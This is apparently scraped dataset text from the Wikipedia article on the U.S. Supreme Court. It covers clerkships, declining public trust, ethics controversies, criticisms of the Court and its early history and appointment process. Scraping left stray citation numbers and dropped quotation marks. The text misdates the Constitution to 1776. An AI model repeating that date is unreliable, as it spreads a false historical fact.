appeals had also become a prerequisite to clerking for a Supreme Court justice. Ten Supreme Court justices previously clerked for other justices: Byron White for Frederick M. Vinson, John Paul Stevens for Wiley Rutledge, William Rehnquist for Robert H. Jackson, Stephen Breyer for Arthur Goldberg, John Roberts for William Rehnquist, Elena Kagan for Thurgood Marshall, Neil Gorsuch for both Byron White and Anthony Kennedy, Brett Kavanaugh also for Kennedy, Amy Coney Barrett for Antonin Scalia, and Ketanji Brown Jackson for Stephen Breyer. Justices Gorsuch and Kavanaugh served under Kennedy during the same term. Gorsuch is the first justice to clerk for and subsequently serve alongside the same justice, serving alongside Kennedy from April 2017 through Kennedy's retirement in 2018. With the confirmation of Justice Kavanaugh, for the first time a majority of the Supreme Court was composed of former Supreme Court law clerks (Roberts, Breyer, Kagan, Gorsuch and Kavanaugh, now joined by Barrett and Jackson). Several current Supreme Court justices have also clerked in the federal courts of appeals: John Roberts for Judge Henry Friendly of the United States Court of Appeals for the Second Circuit, Justice Samuel Alito for Judge Leonard I. Garth of the United States Court of Appeals for the Third Circuit, Elena Kagan for Judge Abner J. Mikva of the United States Court of Appeals for the District of Columbia Circuit, Neil Gorsuch for Judge David B. Sentelle of the United States Court of Appeals for the District of Columbia, Brett Kavanaugh for Judge Walter Stapleton of the United States Court of Appeals for the Third Circuit and Judge Alex Kozinski of the United States Court of Appeals for the Ninth Circuit, and Amy Coney Barrett for Judge Laurence Silberman of the U.S. Court of Appeals for the D.C. Circuit. Clerks hired by each of the justices of the Supreme Court are often given considerable leeway in the opinions they draft. "Supreme Court clerkship appeared to be a nonpartisan institution from the 1940s into the 1980s, according to a study published in 2009 by the law review of Vanderbilt University Law School. 240 241 "As law has moved closer to mere politics, political affiliations have naturally and predictably become proxies for the different political agendas that have been pressed in and through the courts, former federal court of appeals judge J. Michael Luttig said. 240 David J. Garrow, professor of history at the University of Cambridge, stated that the court had thus begun to mirror the political branches of government. "We are getting a composition of the clerk workforce that is getting to be like the House of Representatives, Professor Garrow said. "Each side is putting forward only ideological purists. 240 According to the Vanderbilt Law Review study, this politicized hiring trend reinforces the impression that the Supreme Court is "a superlegislature responding to ideological arguments rather than a legal institution responding to concerns grounded in the rule of law. 240 The following are some of the criticisms and controversies about the Court that are not discussed in previous sections. Unlike in most high courts, the United States Supreme Court has lifetime tenure, an unusual amount of power over elected branches of government, and a difficult constitution to amend. 242 These, among other factors, have been attributed by some critics to the Court's diminished stature abroad 243 and lower approval ratings at home, which have dropped from the mid 60s in the late 1980s to around 40% in the early 2020s. Additional factors cited by critics include the polarization of national politics, ethics scandals, and specific controversial partisan rulings, including the relaxation of campaign finance rules, 244 increased gerrymandering, 245 weakened voting rights, 246 Dobbs v. Jackson and Bush v. Gore. 247 The continued consolidation of power by the court and, as a result of its rulings, the Republican Party, has sparked debate over when democratic backsliding becomes entrenched single-party rule. 247 Public trust in the court peaked in the late 1980s. Since the 2022 Dobbs ruling that overturned Roe v. Wade and permitted states to restrict abortion rights, Democrats and independents have increasingly lost trust in the court, seen the court as political, and expressed support for reforming the institution. 248 Historically, the court had relatively more trust than other government institutions. 249 After recording recent high approval ratings in the late 1980s around 66% approval, 250 the court's ratings have declined to an average of around 40% between mid 2021 and February 2024. 251 The electoral college (which elects the President who nominates the justices) and the U.S. Senate which confirms the justices, have selection biases that favor rural states that tend to vote Republican, resulting in a conservative Supreme Court. 252 Ziblatt and Levitsky estimate that 3 or 4 of the seats held by conservative justices on the court would be held by justices appointed by a Democratic president if the Presidency and Senate were selected directly by the popular vote. 253 The three Trump appointees to the court were all nominated by a president who finished second in the popular vote and confirmed by Senators representing a minority of Americans. 254 In addition, Clarence Thomas' confirmation in 1991 and Merrick Garland's blocked confirmation in 2016 were both decided by senators representing a minority of Americans. 255 Greg Price also critiqued the Court as minority rule. 256 Moreover, the Federalist Society acted as a filter for judicial nominations during the Trump administration, 257 ensuring the latest conservative justices lean even further to the right. 252 86% of judges Trump appointed to circuit courts and the Supreme Court were Federalist Society members. 258 David Litt critiques it as "an attempt to impose rigid ideological dogma on a profession once known for intellectual freedom. 259 Kate Aronoff criticizes the donations from special interests like fossil fuel companies and other dark money groups to the Federalist Society and related organizations seeking to influence lawyers and Supreme Court Justices. 260 The 2016 stonewalling of Merrick Garland's confirmation and subsequent filling with Neil Gorsuch has been critiqued as a 'stolen seat' citing precedent from the 20th century of confirmations during election years, 261 262 while proponents cited three blocked nominations between 1844 and 1866. 263 In recent years, Democrats have accused Republican leaders such as Mitch McConnell of hypocrisy, as they were instrumental in blocking the nomination of Merrick, but then rushing through the appointment of Amy Coney Barrett, even though both vacancies occurred close to an election. 264 Ethical controversies have grown with reports of justices (and their close family members) accepting expensive gifts, travel, business deals, and speaking fees without oversight or recusals from cases that present conflicts of interest. 265 266 267 268 269 270 271 Spousal income and connections to cases has been redacted from the Justices' ethical disclosure forms 272 while justices, such as Samuel Alito and Clarence Thomas, failed to disclose many large financial gifts including free vacations valued at as much as $500,000. 273 274 In 2024, Justices Alito and Thomas refused calls to recuse themselves from January 6th cases where their spouses have taken public stances or been involved in efforts to overturn the election. 275 276 277 278 The criticism intensified after the 2024 Trump v. United States decision granted broad immunity to presidents, with Representative Alexandria Ocasio-Cortez saying she would introduce impeachment articles when Congress is back in session. 279 On July 10, 2024, she filed Articles of Impeachment against Thomas and Alito, citing their "widely documented financial and personal entanglements. 280 281 282 283 As of late July, 2024, nearly 1.4 million people had signed a moveon.org petition asking Congress to remove Justice Thomas. 284 285 President Biden proposed term limits for justices, an enforceable ethics code, and elimination of "immunity for crimes a former president committed while in office". 286 287 288 Yale professor of constitutional law Akhil Reed Amar wrote an op-ed for The Atlantic titled Something Has Gone Deeply Wrong at the Supreme Court. 289 Other criticisms of the Court include weakening corruption laws impacting branches beyond the judiciary 290 291 and citing falsehoods in written opinions, often supplied to the justices by amicus briefs from groups advocating a particular outcome. 210 Allison Orr Larsen, Associate Dean at William Mary Law School, wrote in Politico that the court should address this by requiring disclosure of all funders of amicus briefs and the studies they cite, only admit briefs that stay within the expertise of the authors (as is required in lower courts), and require the briefs to be submitted much earlier in the process so the history and facts have time to be challenged and uncovered. 209 The Supreme Court Historical Society's controversies include fundraising done by the Justices from corporations and wealthy donors apparently seeking access to the justices. 292 293 294 295 On November 13, 2023, the court issued its first-ever Code of Conduct for Justices of the Supreme Court of the United States to set "ethics rules and principles that guide the conduct of the Members of the Court. 296 297 The Code has been received by some as a significant first step 298 but does not address the ethics concerns of many notable critics who found the Code was a significantly weakened version of the rules for other federal judges, let alone the legislature and the executive branch, while also lacking an enforcement mechanism. 299 300 301 The Code's commentary denied past wrongdoing by saying that the Justices have largely abided by these principles and are simply publishing them now. 302 303 304 This has prompted some criticism that the court hopes to legitimize past and future scandals through this Code. 305 306 The ethics rules guiding the justices are set and enforced by the justices themselves, meaning the members of the court have no external checks on their behavior other than the impeachment of a justice by Congress. 307 308 Chief Justice Roberts refused to testify before the Senate Judiciary Committee in April 2023, reasserting his desire for the Supreme Court to continue to monitor itself despite mounting ethics scandals. 309 Lower courts, by contrast, discipline according to the 1973 Code of Conduct for U.S. judges which is enforced by the Judicial Conduct and Disability Act of 1980. 307 Article III, Section I of the Constitution of the United States (1776) establishes that the justices hold their office during good behavior. Thus far only one justice (Associate Justice Samuel Chase in 1804) has ever been impeached, and none has ever been removed from office. 310 The lack of external enforcement of ethics or other conduct violations makes the Supreme Court an outlier in modern organizational best-practices. 307 2024 reform legislation has been blocked by congressional Republicans. 278 Thomas Keck argues that because the Court has historically not served as a strong bulwark for democracy, the Roberts Court has the opportunity to go down in history as a defender of democracy. However, he believes that if the court shields Trump from criminal prosecution (after ensuring his access to the ballot), then the risks that come with an anti-democratic status-quo of the current court will outweigh the dangers that come from court reform (including court packing). 311 Aziz Z. Huq points to the blocking progress of democratizing institutions, increasing the disparity in wealth and power, and empowering an authoritarian white nationalist movement as evidence that the Supreme Court has created a "permanent minority" incapable of being defeated democratically. 312 Slate published an op-ed on July 3, 2024, by Dahlia Lithwick and Mark Joseph Stern criticizing several recent decisions, stating: The Supreme Court's conservative supermajority has, in recent weeks, restructured American democracy in the Republican Party's preferred image, fundamentally altering the balance of power between the branches and the citizens themselves.... In the course of its most recent term that conservative supermajority has created a monarchical presidency, awarding the chief executive near-insurmountable immunity from accountability for any and all crimes committed during a term in office. It has seized power from Congress, strictly limiting lawmakers' ability to write broad laws that tackle the major crises of the moment. And it has hobbled federal agencies' authority to apply existing statutes to problems on the ground, substituting the expert opinions of civil servants with the (often partisan) preferences of unelected judges. All the while, the court has placed itself at the apex of the state, agreeing to share power only with a strongman president who seeks to govern in line with the conservative justices' vision. 313 Some of the most notable historical decisions that were criticized for failing to protect individual rights include the Dred Scott (1857) decision that said people of African descent could not be U.S. citizens or enjoy constitutionally protected rights and privileges, 314 Plessy v. Ferguson (1896) that upheld segregation under the doctrine of separate but equal, 315 the Civil Rights Cases (1883) and Slaughter-House Cases (1873) that all but undermined civil rights legislation enacted during the Reconstruction era. 316 However, others argue that the court is too protective of some individual rights, particularly those of people accused of crimes or in detention. For example, Chief Justice Warren Burger criticized the exclusionary rule, and Justice Scalia criticized Boumediene v. Bush for being too protective of the rights of Guantanamo detainees, arguing habeas corpus should be limited to sovereign territory. 317 After Dobbs v. Jackson Women's Health Organization overturned nearly 50 years of precedent set by Roe v. Wade, some experts expressed concern that this may be the beginning of a rollback of individual rights that had been previously established under the substantive due process principle, in part because Justice Clarence Thomas wrote in his concurring opinion in Dobbs that the decision should prompt the court to reconsider all of the court's past substantive due process decisions. 318 Due process rights claimed to be at risk are: 318 Some experts such as Melissa Murray, law professor at N.Y.U. School of Law, have claimed that protections for interracial marriage, established in Loving v. Virginia (1967), may also be at risk. 319 Other experts such as Josh Blackman, law professor at South Texas College of Law Houston, argued that Loving actually relied more heavily upon Equal Protection Clause grounds than substantive due process. 320 Substantive due process has also been the primary vehicle used by the Supreme Court to incorporate the Bill of Rights against state and local governments. 321 Clarence Thomas referred to it as 'legal fiction, 322 preferring the Privileges or Immunities Clause for incorporating the Bill of Rights. 323 However, outside of Neil Gorsuch's commentary in Timbs v. Indiana, Thomas has received little support for this viewpoint. 324 better source needed The Supreme Court has been criticized for engaging in judicial activism. This criticism is leveled by those who believe the court should not interpret the law in any way besides through the lens of past precedent or Textualism. However, those on both sides of the political aisle often level this accusation at the court. The debate around judicial activism typically involves accusing the other side of activism, whilst denying that your own side engages in it. 325 326 Conservatives often cite the decision in Roe v. Wade (1973) as an example of liberal judicial activism. In its decision, the court legalized abortion on the basis of a "right to privacy" that they found inherent in the Due Process Clause of the Fourteenth Amendment. 327 Roe v. Wade was overturned nearly fifty years later by Dobbs v. Jackson (2022), ending the recognition of abortion access as a constitutional right and returning the issue of abortion back to the states. David Litt criticized the decision in Dobbs as activism on the part of the court's conservative majority because the court failed to respect past precedent, eschewing the principle of Stare decisis that usually guides the court's decisions. 328 The decision in Brown v. Board of Education, which banned racial segregation in public schools was also criticized as activist by conservatives Pat Buchanan, 329 Robert Bork 330 and Barry Goldwater. 331 More recently, Citizens United v. Federal Election Commission was criticized for expanding upon the precedent in First National Bank of Boston v. Bellotti (1978) that the First Amendment applies to corporations. 332 Foreign Policy writer Colm Quinn says that a criticism leveled at the court, as well as other American institutions, is that after two centuries they are beginning to look their age. He cites four features of the United States Supreme Court that make it different from high courts in other countries, and help explain why polarization is an issue in the United States court: 333 Adam Liptak wrote in 2008 that the court has declined in relevance in other constitutional courts. He cites factors like American exceptionalism, the relatively few updates to the constitution or the courts, the rightward shift of the court and the diminished stature of the United States abroad. 243 Michael Waldman argued that no other country gives its Supreme Court as much power. 334 Warren E. Burger, before becoming Chief Justice, argued that since the Supreme Court has such "unreviewable power", it is likely to "self-indulge itself", and unlikely to "engage in dispassionate analysis. 335 Larry Sabato wrote that the federal courts, and especially the Supreme Court, have excessive power. 100 Suja A. Thomas argues the Supreme Court has taken most of the constitutionally-defined power from juries in the United States for itself 336 thanks in part to the influence of legal elites and companies that prefer judges over juries 337 as well as the inability of the jury to defend its power. 338 Some members of Congress considered the results from the 2021 2022 term a shift of government power into the Supreme Court, and a "judicial coup". 339 The 2021 2022 term of the court was the first full term following the appointment of three judges by Republican president Donald Trump — Neil Gorsuch, Brett Kavanaugh, and Amy Coney Barrett — which created a six-strong conservative majority on the court. Subsequently, at the end of the term, the court issued a number of decisions that favored this conservative majority while significantly changing the landscape with respect to rights. These included Dobbs v. Jackson Women's Health Organization which overturned Roe v. Wade and Planned Parenthood v. Casey in recognizing abortion is not a constitutional right, New York State Rifle Pistol Association, Inc. v. Bruen which made public possession of guns a protected right under the Second Amendment, Carson v. Makin and Kennedy v. Bremerton School District which both weakened the Establishment Clause separating church and state, and West Virginia v. EPA which weakened the power of executive branch agencies to interpret their congressional mandate. 340 341 342 There has been debate throughout American history about the boundary between federal and state power. While Framers such as James Madison 343 and Alexander Hamilton 344 argued in The Federalist Papers that their then-proposed Constitution would not infringe on the power of state governments, 345 346 347 348 others argue that expansive federal power is good and consistent with the Framers' wishes. 349 The Tenth Amendment to the United States Constitution explicitly grants "powers not delegated to the United States by the Constitution, nor prohibited by it to the States, are reserved to the States respectively, or to the people. The court has been criticized for giving the federal government too much power to interfere with state authority. citation needed One criticism is that it has allowed the federal government to misuse the Commerce Clause by upholding regulations and legislation which have little to do with interstate commerce, but that were enacted under the guise of regulating interstate commerce; and by voiding state legislation for allegedly interfering with interstate commerce. For example, the Commerce Clause was used by the Fifth Circuit Court of Appeals to uphold the Endangered Species Act, thus protecting six endemic species of insect near Austin, Texas, despite the fact that the insects had no commercial value and did not travel across state lines; the Supreme Court let that ruling stand without comment in 2005. 350 Chief Justice John Marshall asserted Congress's power over interstate commerce was "complete in itself, may be exercised to its utmost extent, and acknowledges no limitations, other than are prescribed in the Constitution. 351 Justice Alito said congressional authority under the Commerce Clause is "quite broad"; 352 modern-day theorist Robert B. Reich suggests debate over the Commerce Clause continues today. 351 Advocates of states' rights, such as constitutional scholar Kevin Gutzman, have also criticized the court, saying it has misused the Fourteenth Amendment to undermine state authority. Justice Brandeis, in arguing for allowing the states to operate without federal interference, suggested that states should be laboratories of democracy. 353 One critic wrote "the great majority of Supreme Court rulings of unconstitutionality involve state, not federal, law. 354 Others see the Fourteenth Amendment as a positive force that extends "protection of those rights and guarantees to the state level. 355 More recently, in Gamble v. United States, the Court examined the doctrine of "separate sovereigns", whereby a criminal defendant can be prosecuted in state court as well as federal court on separate charges for the same offense. 356 357 Some Court decisions have been criticized for injecting the court into the political arena, and deciding questions that are the purview of the elected branches of government. The Bush v. Gore decision, in which the Supreme Court intervened in the 2000 presidential election, awarding George W. Bush the presidency over Al Gore, received scrutiny as political based on the controversial justifications used by the five conservative justices to elevate a fellow conservative to the presidency. 358 359 360 361 362 The court has been criticized for keeping its deliberations hidden from public view. 363 364 For example, the increasing use of a 'shadow docket' facilitates the court making decisions in secret without knowing how each Justice came to their decision. 365 366 In 2024, after comparing the analysis of shadow-docket decisions to Kremlinology, Matt Ford called this trend of secrecy "increasingly troubling", arguing the court's power comes entirely from persuasion and explanation. 367 A 2007 review of Jeffrey Toobin's book compared the Court to a cartel where its inner-workings are mostly unknown, arguing this lack of transparency reduces scrutiny which hurts ordinary Americans who know little about the nine extremely consequential Justices. 358 A 2010 poll found that 61% of American voters agreed that televising Court hearings would "be good for democracy", and 50% of voters stated they would watch Court proceedings if they were televised. 368 369 Ian Millhiser of Vox speculates that the decades-long decline in cases heard could be due to the increasing political makeup of judges, that he says might be more interested in settling political disputes than legal ones. 370 British constitutional scholar Adam Tomkins sees flaws in the American system of having courts (and specifically the Supreme Court) act as checks on the Executive and Legislative branches; he argues that because the courts must wait, sometimes for years, for cases to navigate their way through the system, their ability to restrain other branches is severely weakened. 371 372 In contrast, various other countries have a dedicated constitutional court that has original jurisdiction on constitutional claims brought by persons or political institutions; for example, the Federal Constitutional Court of Germany, which can declare a law unconstitutional when challenged. Critics have accused the Court of "slow-walking" important cases relating to former President Donald Trump in order to benefit his election chances in the face of the 2024 United States presidential election. 373 The Court is considering a Presidential immunity claim as part of the Federal prosecution of Donald Trump (election obstruction case). Critics argue that the Court has acted slowly in order to delay this case until after the election. They point out that the Court can move quickly when it wants to, as it did when it disregarded typical procedures in Bush v. Gore, granting the petition on a Saturday, receiving briefs on Sunday, holding oral arguments on Monday, and issuing the final opinion on Tuesday. 373 Author Sonja West, of Slate, argues that the Federal prosecution of Donald Trump (election obstruction case) is of similar importance to Bush v. Gore and should therefore be treated as expeditiously, but the Court seems to be taking the opposite approach. 373 Sometimes draft opinions are deliberately leaked or inadvertently released before they are published. Such releases are often purported to harm the court's reputation. 374 Chief Justice Roberts has previously described leaks as an "egregious breach of trust" that "undermine the integrity of our operations" in reference to the leaked draft opinion for Dobbs v. Jackson Women's Health Organization. 375 In addition to leaks, the Court has sometimes mistakenly released opinions before they are ready to be published. On June 26, 2024, the Court inadvertently posted an opinion for Moyle v. United States to its website that seemed to indicate that the court will temporarily allow abortions in medical emergencies in Idaho. 376 The official opinion was posted the next day, which returned the case to the lower courts without a ruling on the merits. |
215 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Supreme_Court_of_the_United_States | The Supreme Court of the United States (SCOTUS) is the highest court in the federal judiciary of the United States. It has ultimate appellate jurisdiction over all U.S. federal court cases, and over state court cases that turn on questions of U.S. constitutional or federal law. It also has original jurisdiction over a narrow range of cases, specifically "all Cases affecting Ambassadors, other public Ministers and Consuls, and those in which a State shall be Party. 2 The court holds the power of judicial review: the ability to invalidate a statute for violating a provision of the Constitution. It is also able to strike down presidential directives for violating either the Constitution or statutory law. 3 Established by Article Three of the United States Constitution, the composition and procedures of the Supreme Court were originally established by the 1st Congress through the Judiciary Act of 1789. The court consists of nine justices: the chief justice of the United States and eight associate justices, and the justices meet at the Supreme Court Building in Washington, D.C. Justices have lifetime tenure, meaning they remain on the court until they die, retire, resign, or are impeached and removed from office. 3 When a vacancy occurs, the president, with the advice and consent of the Senate, appoints a new justice. Each justice has a single vote in deciding the cases argued before the court. When in the majority, the chief justice decides who writes the opinion of the court; otherwise, the most senior justice in the majority assigns the task of writing the opinion. The Supreme Court receives on average about 7,000 petitions for writs of certiorari each year, but grants only about 80. 4 better source needed needs update It was while debating the separation of powers between the legislative and executive departments that delegates to the 1787 Constitutional Convention established the parameters for the national judiciary. Creating a "third branch" of government was a novel idea citation needed ; in the English tradition, judicial matters had been treated as an aspect of royal (executive) authority. Early on, the delegates who were opposed to having a strong central government argued that national laws could be enforced by state courts, while others, including James Madison, advocated for a national judicial authority consisting of tribunals chosen by the national legislature. It was proposed that the judiciary should have a role in checking the executive's power to veto or revise laws. citation needed Eventually, the framers compromised by sketching only a general outline of the judiciary in Article Three of the United States Constitution, vesting federal judicial power in "one supreme Court, and in such inferior Courts as the Congress may from time to time ordain and establish. 5 6 better source needed They delineated neither the exact powers and prerogatives of the Supreme Court nor the organization of the judicial branch as a whole. citation needed The 1st United States Congress provided the detailed organization of a federal judiciary through the Judiciary Act of 1789. The Supreme Court, the country's highest judicial tribunal, was to sit in the nation's capital and would initially be composed of a chief justice and five associate justices. The act also divided the country into judicial districts, which were in turn organized into circuits. Justices were required to "ride circuit" and hold circuit court twice a year in their assigned judicial district. 7 non-primary source needed Immediately after signing the act into law, President George Washington nominated the following people to serve on the court: John Jay for chief justice and John Rutledge, William Cushing, Robert H. Harrison, James Wilson, and John Blair Jr. as associate justices. All six were confirmed by the Senate on September 26, 1789; however, Harrison declined to serve, and Washington later nominated James Iredell in his place. 8 non-primary source needed The Supreme Court held its inaugural session from February 2 through February 10, 1790, at the Royal Exchange in New York City, then the U.S. capital. 9 A second session was held there in August 1790. 10 The earliest sessions of the court were devoted to organizational proceedings, as the first cases did not reach it until 1791. 7 When the nation's capital was moved to Philadelphia in 1790, the Supreme Court did so as well. After initially meeting at Independence Hall, the court established its chambers at City Hall. 11 Under chief justices Jay, Rutledge, and Ellsworth (1789 1801), the court heard few cases; its first decision was West v. Barnes (1791), a case involving procedure. 12 As the court initially had only six members, every decision that it made by a majority was also made by two-thirds (voting four to two). 13 However, Congress has always allowed less than the court's full membership to make decisions, starting with a quorum of four justices in 1789. 14 The court lacked a home of its own and had little prestige, 15 a situation not helped by the era's highest-profile case, Chisholm v. Georgia (1793), which was reversed within two years by the adoption of the Eleventh Amendment. 16 The court's power and prestige grew substantially during the Marshall Court (1801 1835). 17 Under Marshall, the court established the power of judicial review over acts of Congress, 18 including specifying itself as the supreme expositor of the Constitution (Marbury v. Madison) 19 20 and making several important constitutional rulings that gave shape and substance to the balance of power between the federal government and states, notably Martin v. Hunter's Lessee, McCulloch v. Maryland, and Gibbons v. Ogden. 21 22 23 24 The Marshall Court also ended the practice of each justice issuing his opinion seriatim, 25 a remnant of British tradition, 26 and instead issuing a single majority opinion. 25 Also during Marshall's tenure, although beyond the court's control, the impeachment and acquittal of Justice Samuel Chase from 1804 to 1805 helped cement the principle of judicial independence. 27 28 The Taney Court (1836 1864) made several important rulings, such as Sheldon v. Sill, which held that while Congress may not limit the subjects the Supreme Court may hear, it may limit the jurisdiction of the lower federal courts to prevent them from hearing cases dealing with certain subjects. 29 Nevertheless, it is primarily remembered for its ruling in Dred Scott v. Sandford, 30 which helped precipitate the American Civil War. 31 In the Reconstruction era, the Chase, Waite, and Fuller Courts (1864 1910) interpreted the new Civil War amendments to the Constitution 24 and developed the doctrine of substantive due process (Lochner v. New York; 32 Adair v. United States). 33 The size of the court was last changed in 1869, when it was set at nine. Under the White and Taft Courts (1910 1930), the court held that the Fourteenth Amendment had incorporated some guarantees of the Bill of Rights against the states (Gitlow v. New York), 34 grappled with the new antitrust statutes (Standard Oil Co. of New Jersey v. United States), upheld the constitutionality of military conscription (Selective Draft Law Cases), 35 and brought the substantive due process doctrine to its first apogee (Adkins v. Children's Hospital). 36 During the Hughes, Stone, and Vinson courts (1930 1953), the court gained its own accommodation in 1935 37 and changed its interpretation of the Constitution, giving a broader reading to the powers of the federal government to facilitate President Franklin D. Roosevelt's New Deal (most prominently West Coast Hotel Co. v. Parrish, Wickard v. Filburn, United States v. Darby, and United States v. Butler). 38 39 40 During World War II, the court continued to favor government power, upholding the internment of Japanese Americans (Korematsu v. United States) and the mandatory Pledge of Allegiance (Minersville School District v. Gobitis). Nevertheless, Gobitis was soon repudiated (West Virginia State Board of Education v. Barnette), and the Steel Seizure Case restricted the pro-government trend. The Warren Court (1953 1969) dramatically expanded the force of Constitutional civil liberties. 41 It held that segregation in public schools violates the Equal Protection Clause of the Fourteenth Amendment (Brown v. Board of Education, Bolling v. Sharpe, and Green v. County School Bd.) 42 and that legislative districts must be roughly equal in population (Reynolds v. Sims). It recognized a general right to privacy (Griswold v. Connecticut), 43 limited the role of religion in public school, most prominently Engel v. Vitale and Abington School District v. Schempp, 44 45 incorporated most guarantees of the Bill of Rights against the states, prominently Mapp v. Ohio (the exclusionary rule) and Gideon v. Wainwright (right to appointed counsel), 46 47 and required that criminal suspects be apprised of all these rights by police (Miranda v. Arizona). 48 At the same time, the court limited defamation suits by public figures (New York Times Co. v. Sullivan) and supplied the government with an unbroken run of antitrust victories. 49 The Burger Court (1969 1986) saw a conservative shift. 50 It also expanded Griswold's right to privacy to strike down abortion laws (Roe v. Wade) 51 but divided deeply on affirmative action (Regents of the University of California v. Bakke) 52 and campaign finance regulation (Buckley v. Valeo). 53 It also wavered on the death penalty, ruling first that most applications were defective (Furman v. Georgia), 54 but later that the death penalty itself was not unconstitutional (Gregg v. Georgia). 54 55 56 The Rehnquist Court (1986 2005) was known for its revival of judicial enforcement of federalism, 57 emphasizing the limits of the Constitution's affirmative grants of power (United States v. Lopez) and the force of its restrictions on those powers (Seminole Tribe v. Florida, City of Boerne v. Flores). 58 59 60 61 62 It struck down single-sex state schools as a violation of equal protection (United States v. Virginia), laws against sodomy as violations of substantive due process (Lawrence v. Texas) 63 and the line-item veto (Clinton v. New York) but upheld school vouchers (Zelman v. Simmons-Harris) and reaffirmed Roe's restrictions on abortion laws (Planned Parenthood v. Casey). 64 The court's decision in Bush v. Gore, which ended the electoral recount during the 2000 United States presidential election, remains especially controversial with debate ongoing over the rightful winner and whether or not the ruling should set a precedent. 65 66 67 68 The Roberts Court (2005 present) is regarded as more conservative and controversial than the Rehnquist Court. 69 70 71 72 Some of its major rulings have concerned federal preemption (Wyeth v. Levine), civil procedure (Twombly Iqbal), voting rights and federal preclearance (Shelby County), abortion (Gonzales v. Carhart and Dobbs v. Jackson Women's Health Organization), 73 climate change (Massachusetts v. EPA), same-sex marriage (United States v. Windsor and Obergefell v. Hodges), and the Bill of Rights, such as in Citizens United v. Federal Election Commission (First Amendment), 74 Heller McDonald Bruen (Second Amendment), 75 and Baze v. Rees (Eighth Amendment). 76 77 Article II, Section 2, Clause 2 of the United States Constitution, known as the Appointments Clause, empowers the president to nominate and, with the confirmation (advice and consent) of the United States Senate, to appoint public officials, including justices of the Supreme Court. This clause is one example of the system of checks and balances inherent in the Constitution. The president has the plenary power to nominate, while the Senate possesses the plenary power to reject or confirm the nominee. The Constitution sets no qualifications for service as a justice, such as age, citizenship, residence or prior judicial experience, thus a president may nominate anyone to serve, and the Senate may not set any qualifications or otherwise limit who the president can choose. 78 79 80 In modern times, the confirmation process has attracted considerable attention from the press and advocacy groups, which lobby senators to confirm or to reject a nominee depending on whether their track record aligns with the group's views. The Senate Judiciary Committee conducts hearings and votes on whether the nomination should go to the full Senate with a positive, negative or neutral report. The committee's practice of personally interviewing nominees is relatively recent. The first nominee to appear before the committee was Harlan Fiske Stone in 1925, who sought to quell concerns about his links to Wall Street, and the modern practice of questioning began with John Marshall Harlan II in 1955. 81 Once the committee reports out the nomination, the full Senate considers it. Rejections are relatively uncommon; the Senate has explicitly rejected twelve Supreme Court nominees, most recently Robert Bork, nominated by President Ronald Reagan in 1987. Although Senate rules do not necessarily allow a negative or tied vote in committee to block a nomination, prior to 2017 a nomination could be blocked by filibuster once debate had begun in the full Senate. President Lyndon B. Johnson's nomination of sitting associate justice Abe Fortas to succeed Earl Warren as Chief Justice in 1968 was the first successful filibuster of a Supreme Court nominee. It included both Republican and Democratic senators concerned with Fortas's ethics. President Donald Trump's nomination of Neil Gorsuch to the seat left vacant by Antonin Scalia's death was the second. Unlike the Fortas filibuster, only Democratic senators voted against cloture on the Gorsuch nomination, citing his perceived conservative judicial philosophy, and the Republican majority's prior refusal to take up President Barack Obama's nomination of Merrick Garland to fill the vacancy. 82 This led the Republican majority to change the rules and eliminate the filibuster for Supreme Court nominations. 83 Not every Supreme Court nominee has received a floor vote in the Senate. A president may withdraw a nomination before an actual confirmation vote occurs, typically because it is clear that the Senate will reject the nominee; this occurred with President George W. Bush's nomination of Harriet Miers in 2005. The Senate may also fail to act on a nomination, which expires at the end of the session. President Dwight Eisenhower's first nomination of John Marshall Harlan II in November 1954 was not acted on by the Senate; Eisenhower re-nominated Harlan in January 1955, and Harlan was confirmed two months later. Most recently, the Senate failed to act on the March 2016 nomination of Merrick Garland, as the nomination expired in January 2017, and the vacancy was filled by Neil Gorsuch, an appointee of President Trump. 84 Once the Senate confirms a nomination, the president must prepare and sign a commission, to which the Seal of the Department of Justice must be affixed, before the appointee can take office. 85 The seniority of an associate justice is based on the commissioning date, not the confirmation or swearing-in date. 86 After receiving their commission, the appointee must then take the two prescribed oaths before assuming their official duties. 87 The importance of the oath taking is underscored by the case of Edwin M. Stanton. Although confirmed by the Senate on December 20, 1869, and duly commissioned as an associate justice by President Ulysses S. Grant, Stanton died on December 24, prior to taking the prescribed oaths. He is not, therefore, considered to have been a member of the court. 88 89 Before 1981, the approval process of justices was usually rapid. From the Truman through Nixon administrations, justices were typically approved within one month. From the Reagan administration to the present, the process has taken much longer and some believe this is because Congress sees justices as playing a more political role than in the past. 90 According to the Congressional Research Service, the average number of days from nomination to final Senate vote since 1975 is 67 days (2.2 months), while the median is 71 days (2.3 months). 91 92 When the Senate is in recess, a president may make temporary appointments to fill vacancies. Recess appointees hold office only until the end of the next Senate session (less than two years). The Senate must confirm the nominee for them to continue serving; of the two chief justices and eleven associate justices who have received recess appointments, only Chief Justice John Rutledge was not subsequently confirmed. 93 No U.S. president since Dwight D. Eisenhower has made a recess appointment to the court, and the practice has become rare and controversial even in lower federal courts. 94 In 1960, after Eisenhower had made three such appointments, the Senate passed a "sense of the Senate" resolution that recess appointments to the court should only be made in "unusual circumstances"; 95 such resolutions are not legally binding but are an expression of Congress's views in the hope of guiding executive action. 95 96 The Supreme Court's 2014 decision in National Labor Relations Board v. Noel Canning limited the ability of the president to make recess appointments (including appointments to the Supreme Court); the court ruled that the Senate decides when the Senate is in session or in recess. Writing for the court, Justice Breyer stated, "We hold that, for purposes of the Recess Appointments Clause, the Senate is in session when it says it is, provided that, under its own rules, it retains the capacity to transact Senate business. 97 This ruling allows the Senate to prevent recess appointments through the use of pro-forma sessions. 98 Lifetime tenure of justices can only be found for US Supreme Court Justices and the State of Rhode Island's Supreme Court justices, with all other democratic nations and all other US states having set term limits or mandatory retirement ages. 99 Larry Sabato wrote: "The insularity of lifetime tenure, combined with the appointments of relatively young attorneys who give long service on the bench, produces senior judges representing the views of past generations better than views of the current day. 100 Sanford Levinson has been critical of justices who stayed in office despite medical deterioration based on longevity. 101 James MacGregor Burns stated lifelong tenure has "produced a critical time lag, with the Supreme Court institutionally almost always behind the times. 102 Proposals to solve these problems include term limits for justices, as proposed by Levinson 103 and Sabato 100 104 and a mandatory retirement age proposed by Richard Epstein, 105 among others. 106 Alexander Hamilton in Federalist 78 argued that one benefit of lifetime tenure was that, "nothing can contribute so much to its firmness and independence as permanency in office. 107 non-primary source needed Article Three, Section 1 of the Constitution provides that justices "shall hold their offices during good behavior", which is understood to mean that they may serve for the remainder 